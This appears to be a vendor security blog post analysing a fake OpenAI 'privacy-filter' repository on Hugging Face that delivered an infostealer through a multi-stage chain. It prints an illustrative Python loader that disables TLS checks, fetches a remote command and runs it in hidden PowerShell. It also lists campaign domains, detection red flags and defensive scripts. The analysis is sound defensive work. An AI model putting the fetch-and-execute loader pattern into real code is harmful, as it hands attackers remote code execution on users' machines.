The Fake OpenAI 'privacy-filter' Model: How a Typosquat Hit #1 on Hugging Face in May 2026

A repository named Open-OSS/privacy-filter impersonated OpenAI's release, copied its model card verbatim, and shipped a loader.py that pulled an infostealer. It reached #1 trending with ~244,000 downloads before removal.

In early May 2026, a Hugging Face repository named Open-OSS/privacy-filter climbed to the #1 trending spot on the platform within roughly 18 hours, accumulating about 244,000 reported downloads before it was removed. It was a fake. The repository typosquatted OpenAI's legitimate openai/privacy-filter release from April 2026, copied the model card nearly verbatim, and shipped a loader.py file that fetched and executed an infostealer on Windows machines. HiddenLayer's research team, which identified and reported the campaign on May 7, 2026, tied it to a cluster of six related repositories and an overlapping npm typosquatting operation.

The incident is a clean illustration of a problem the AI supply chain has been circling for two years: a model repository is not just data, it is executable code with a trust signal attached. The trust signal here was a familiar publisher name, a polished model card, a trending badge, and a six-figure download count. Every one of those signals was either spoofed or inflated. A developer pulling what they believed was OpenAI's privacy filter got a credential stealer instead.

What makes this case worth dissecting is not the malware sophistication, which was modest, but how effectively the attacker exploited the social and ranking mechanics of a model hub. The download count and likes were almost certainly inflated by automated accounts, which pushed the repository to the top of trending, which lent it credibility, which drove real downloads. The supply chain attack and the reputation attack were the same attack.

TL;DR

Open-OSS/privacy-filter typosquatted OpenAI's openai/privacy-filter (released April 2026), copying the model card nearly verbatim.
It shipped a loader.py that disabled SSL verification, decoded a Base64-encoded URL hosted on JSON Keeper, used it to retrieve a command, and passed that command to PowerShell, which fetched a batch script from api.eth-fastscan[.]org.
The batch stage elevated via UAC, added Microsoft Defender exclusions, scheduled a task for persistence, and downloaded a final-stage infostealer that harvested browser data, crypto wallets, FileZilla configs, screenshots, and system metadata. Exfiltration went to recargapopular[.]com.
The repo reached #1 trending in about 18 hours with roughly 244,000 downloads and 667 likes. HiddenLayer assessed those numbers as likely artificially inflated by automated accounts.
HiddenLayer found six related repositories under the anthfu namespace using identical loaders, and an IOC overlap (welovechinatown[.]info) with an npm package (trevlo) delivering ValleyRAT / Winos 4.0.
Disclosed by HiddenLayer on May 7, 2026; covered by The Hacker News and BleepingComputer in mid-May 2026.

What happened

According to HiddenLayer's research, the malicious repository impersonated OpenAI's privacy-filter model, which OpenAI had released in April 2026. The fake repo, Open-OSS/privacy-filter, copied the legitimate model card almost word for word, which is what let it pass a casual human review: the README looked exactly like the real thing.

The repository did not just contain weights. It contained a loader.py script positioned as setup or inference code, the kind of file a user is likely to run to "use" the model. That file was the entry point for the infection chain.

The repository reached #1 on Hugging Face's trending list within about 18 hours and showed roughly 244,000 downloads and 667 likes. HiddenLayer noted that the vast majority of the accounts that liked the repository appeared to be auto-generated and that the download figure was likely artificially inflated. The inflation was not incidental. It manufactured the social proof that pushed the repository onto the trending list, where it harvested genuine downloads from developers who trusted the ranking.
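
One rough way to quantify "likes from auto-generated accounts" is to measure how tightly the liking accounts' creation dates cluster. The sketch below assumes you already have a list of account creation timestamps from some source; the function name, the two-day window, and the input data are all hypothetical, and this is not HiddenLayer's method.

```python
from datetime import datetime, timedelta


def densest_window_share(created_at, window=timedelta(days=2)):
    """Return the largest share of accounts created within any single window.

    created_at: iterable of datetime objects (assumed input, one per liking account).
    window: width of the sliding window; two days is an arbitrary illustrative default.
    """
    times = sorted(created_at)
    if not times:
        return 0.0
    best = 0
    start = 0
    # Classic two-pointer sweep over the sorted timestamps.
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best / len(times)
```

A share close to 1.0 means nearly every liking account was created in the same short burst, which is worth a closer look; organic audiences tend to have creation dates spread over years. The threshold at which to alert is a judgment call and is deliberately left out.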

HiddenLayer identified six additional repositories under the anthfu namespace using identical Python loaders, including names crafted to look like plausible model releases (for example GGUF-formatted variants of well-known model families). The firm also reported an IOC overlap with an npm package named trevlo (published April 4, 2026) that delivered ValleyRAT / Winos 4.0, sharing the welovechinatown[.]info domain. That overlap suggests the model-hub campaign was one arm of a broader operation targeting open-source ecosystems.

How the attack worked

The infection chain was multi-stage, with each stage adding evasion and persistence. The following is a defensive reconstruction from HiddenLayer's and The Hacker News' reporting. It is descriptive, not a runnable exploit.

Stage 1, the loader. The loader.py script, disguised as model setup code, disabled SSL certificate verification, decoded a Base64-encoded URL hosted on JSON Keeper, and used it to retrieve a command that was passed to PowerShell for execution. Disabling SSL verification is a tell: legitimate model loading code has no reason to do it.

# Illustrative shape of the malicious loader stage. NOT functional exploit code.
# Red flags: disabled TLS verification, base64-decoded remote URL,
# remote content handed to a shell.

import base64, ssl, urllib.request, subprocess

ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE            # red flag #1

url = base64.b64decode("<encoded-jsonkeeper-url>").decode()  # red flag #2
cmd = urllib.request.urlopen(url, context=ctx).read().decode()
subprocess.run(["powershell", "-WindowStyle", "Hidden", cmd])  # red flag #3

Stage 2, the batch downloader. PowerShell fetched a batch script from api.eth-fastscan[.]org. That script elevated privileges via a UAC bypass, configured Microsoft Defender exclusions to keep the next stage from being scanned, downloaded the next-stage binary, and scheduled a task for persistence.

Stage 3, the infostealer. The final payload harvested screenshots, cryptocurrency wallets and wallet browser extensions, wallet seed phrases, system metadata, FileZilla configuration files, and credentials from Chromium- and Gecko-based browsers. Stolen data was exfiltrated to recargapopular[.]com.

The notable design choice across all stages is the reliance on legitimate-looking infrastructure (JSON Keeper as a paste-style URL host, Hugging Face itself as the distribution channel) so that the only obviously suspicious artifact is the loader.py behavior. A user who never reads the loader sees only a trending OpenAI model.

What detection looks like

For an organization that pulls models from Hugging Face, the detectable signals fall into two buckets: repository-level and endpoint-level.

Repository and supply-chain signals:

Publisher namespace mismatch. The real release is openai/privacy-filter; the malicious one is Open-OSS/privacy-filter. Any model card that claims to be from a major lab but lives under a different org namespace is a hard signal. Verbatim model-card copying with a different owner is a typosquat fingerprint.
Executable Python in a "model" repo. A loader.py or setup script that performs network fetches, decodes obfuscated URLs, or spawns shells has no business in a weights distribution. Treat any .py file that calls subprocess, os.system, or eval, or that disables TLS verification, as malicious by default.
Anomalous trending velocity. A brand-new repository that reaches #1 trending in under a day, with likes overwhelmingly from accounts created in a tight window, is a manufactured-reputation pattern.
Known IOCs from this campaign. Domains api.eth-fastscan[.]org, recargapopular[.]com, and welovechinatown[.]info; the anthfu namespace; npm package trevlo.

Endpoint signals (if a developer already ran the loader):

Python or model tooling spawning powershell.exe with a hidden window.
New Microsoft Defender exclusion entries created by a non-admin-initiated process.
New scheduled tasks created shortly after a pip/model-download workflow.
Outbound connections to the IOC domains above, or to JSON Keeper from a Python process.
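
The outbound-connection signal reduces to matching the campaign's domains against DNS or proxy logs. Below is a minimal sketch that assumes logs are available as plain text lines; the log format and function names are hypothetical, and the indicators are kept defanged in source and refanged only at match time.

```python
import re

# Defanged indicators exactly as listed in this article.
DEFANGED_IOCS = [
    "api.eth-fastscan[.]org",
    "recargapopular[.]com",
    "welovechinatown[.]info",
]


def refang(indicator):
    """Turn 'example[.]com' back into 'example.com' for matching."""
    return indicator.replace("[.]", ".")


def build_matcher(defanged):
    """Compile one regex matching any IOC domain or a subdomain of it."""
    alternatives = "|".join(re.escape(refang(d)) for d in defanged)
    return re.compile(
        r"(?<![A-Za-z0-9-])"            # must start at a hostname label boundary
        r"(?:[A-Za-z0-9-]+\.)*"         # optional subdomain labels
        r"(" + alternatives + r")"
        r"(?![A-Za-z0-9-])"             # the domain must not run on into more label characters
        r"(?!\.[A-Za-z0-9])",           # nor continue as a longer, different domain
        re.IGNORECASE,
    )


def hunt(lines, matcher):
    """Yield (line_number, matched_ioc, line) for each log line containing an IOC."""
    for number, line in enumerate(lines, start=1):
        match = matcher.search(line)
        if match:
            yield number, match.group(1).lower(), line.rstrip("\n")
```

The boundary checks are there so that a look-alike such as notrecargapopular.com or recargapopular.com.example.net does not produce a false hit, while a trailing-dot FQDN as written by many DNS loggers still matches.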

What to do Monday morning

Search your environment for the IOCs. Hunt for the domains api.eth-fastscan[.]org, recargapopular[.]com, and welovechinatown[.]info in DNS and proxy logs, and for any local clone or download of Open-OSS/privacy-filter or the anthfu repositories. Treat hits as a compromised-credential incident: rotate browser-stored credentials, crypto wallets, and any secrets that were on affected machines.
Block executable code paths in model ingestion. Add a gate that refuses to import any model repository containing .py files that spawn shells, decode remote URLs, or disable TLS verification. For most production use you only need the weights, the tokenizer, and the config.
Pin to verified publishers and exact commits. Pull models only from verified org namespaces, and pin to a specific commit SHA, not a moving branch. Confirm the publisher namespace matches the lab you intend (openai/..., not a look-alike org).
Stop trusting trending and download counts as a security signal. They are gameable and were gamed here. Ranking is a discovery aid, not a provenance guarantee.
Prefer safetensors and load in isolation. Where possible, restrict ingestion to safetensors artifacts and run any first-time load in a sandboxed environment with no credential access and egress monitoring.
Scan models before they touch a developer machine. Run a model scanner over downloaded repositories and gate on the result, the same way you would scan an npm or PyPI package before install.
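
The pinning and safetensors-only steps above can be expressed as a small pre-download policy check. This is a sketch under stated assumptions: the namespace allowlist, the file patterns, and both function names are hypothetical policy choices, not a Hugging Face feature.

```python
import re
from fnmatch import fnmatchcase

# Hypothetical policy values; adjust to the publishers and artifacts you actually use.
VERIFIED_NAMESPACES = {"openai"}
ALLOWED_FILE_PATTERNS = ["*.safetensors", "*.json", "*.txt", "tokenizer.model"]
FULL_COMMIT_SHA = re.compile(r"^[0-9a-f]{40}$")


def check_model_request(repo_id, revision):
    """Return a list of policy violations for a requested model pull (empty means OK)."""
    problems = []
    namespace, _, name = repo_id.partition("/")
    if not name:
        problems.append("repo id must be 'namespace/name'")
    elif namespace not in VERIFIED_NAMESPACES:
        problems.append(f"namespace '{namespace}' is not on the verified list")
    if not FULL_COMMIT_SHA.match(revision or ""):
        problems.append("revision must be a full 40-character commit SHA, not a branch or tag")
    return problems


def split_files(filenames):
    """Partition a repository file listing into (allowed, rejected) by basename pattern."""
    allowed, rejected = [], []
    for filename in filenames:
        basename = filename.rsplit("/", 1)[-1]
        ok = any(fnmatchcase(basename, pattern) for pattern in ALLOWED_FILE_PATTERNS)
        (allowed if ok else rejected).append(filename)
    return allowed, rejected
```

If you download with the huggingface_hub library, its snapshot_download function accepts revision and allow_patterns arguments, so the same SHA and pattern list can be passed straight through; with an allowlist like this one, a loader.py or batch file is simply never fetched.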

Why this keeps happening

Model hubs inherited the worst property of package registries (arbitrary code distributed under a name-based trust model) without the decade of hard-won registry defenses that came with it. On PyPI and npm, typosquatting, install-time code execution, and reputation gaming are well-understood threats with mature, if imperfect, countermeasures. On model hubs, the same threats arrived faster than the defenses.

Three structural factors make it worse. First, model repositories routinely ship loader and inference scripts, so executable code is normal rather than suspicious, unlike a data-only artifact. Second, the discovery surface (trending, likes, downloads) is socially gameable and is treated by users as a credibility signal. Third, the trust anchor is a string. openai/privacy-filter and Open-OSS/privacy-filter differ only in the namespace before the slash, and a verbatim model card erases the visual difference for a hurried developer. The same dynamics that made dependency confusion and typosquatting effective on npm map directly onto model hubs.
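
Because the trust anchor is a string, the impersonation pattern in this incident (same repository name, different namespace) can be caught with a plain string comparison. The sketch below assumes you maintain a small registry of model names whose official owner you know; that registry and the function names are hypothetical.

```python
import re

# Hypothetical registry: model name -> namespace of the official publisher.
CANONICAL_OWNERS = {"privacy-filter": "openai"}


def normalize(text):
    """Lower-case and drop punctuation so 'Privacy_Filter' equals 'privacy-filter'."""
    return re.sub(r"[^a-z0-9]", "", text.lower())


def find_impersonation(repo_id, canonical=CANONICAL_OWNERS):
    """Return a finding string if repo_id reuses a known model name under another owner."""
    namespace, _, name = repo_id.partition("/")
    for known_name, owner in canonical.items():
        same_name = normalize(name) == normalize(known_name)
        if same_name and namespace.lower() != owner.lower():
            return f"{repo_id} reuses the name of {owner}/{known_name} under a different namespace"
    return None
```

This only catches exact or punctuation-level name reuse. Catching near-miss names (an added suffix, a swapped character) would need a fuzzy comparison and a tolerance for false positives, which is left out here.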

The structural fix

The realistic defensive goal is to cut the time between "a malicious model appears" and "it is blocked in your environment," and to shrink what a single bad pull can reach. Safeguard treats Hugging Face models as first-class supply-chain components in the AI-BOM, inventorying every model your applications load and linking it to its repository, publisher namespace, and commit SHA. The malicious-package and quarantine feeds that power typosquatting defense extend to model hubs, so a name like Open-OSS/privacy-filter masquerading as openai/privacy-filter surfaces as a finding rather than passing as a trending model. Policy enforcement can require verified publishers, commit-SHA pinning, and safetensors-only loads, and can refuse repositories that ship shell-spawning loader scripts. That would not have stopped the upload, but it shortens dwell time and reduces blast radius, which is the achievable outcome for a registry you do not control. The same engine behind software composition analysis (SCA) applies the package-security discipline to models.

What we know we don't know

The 244,000 download figure is HiddenLayer's reported number with an explicit caveat that it was likely inflated by automated accounts; the count of genuine victim downloads is not public.
The exact attribution is unconfirmed. The IOC overlap with the trevlo / ValleyRAT (Winos 4.0) campaign suggests a possible link, but HiddenLayer frames it as "possibly linked," not confirmed common ownership.
The full victim impact (how many developers ran loader.py versus merely downloaded the repo) is not reported.
Whether the anthfu namespace repositories accrued their own victims before removal is not detailed in the public coverage.
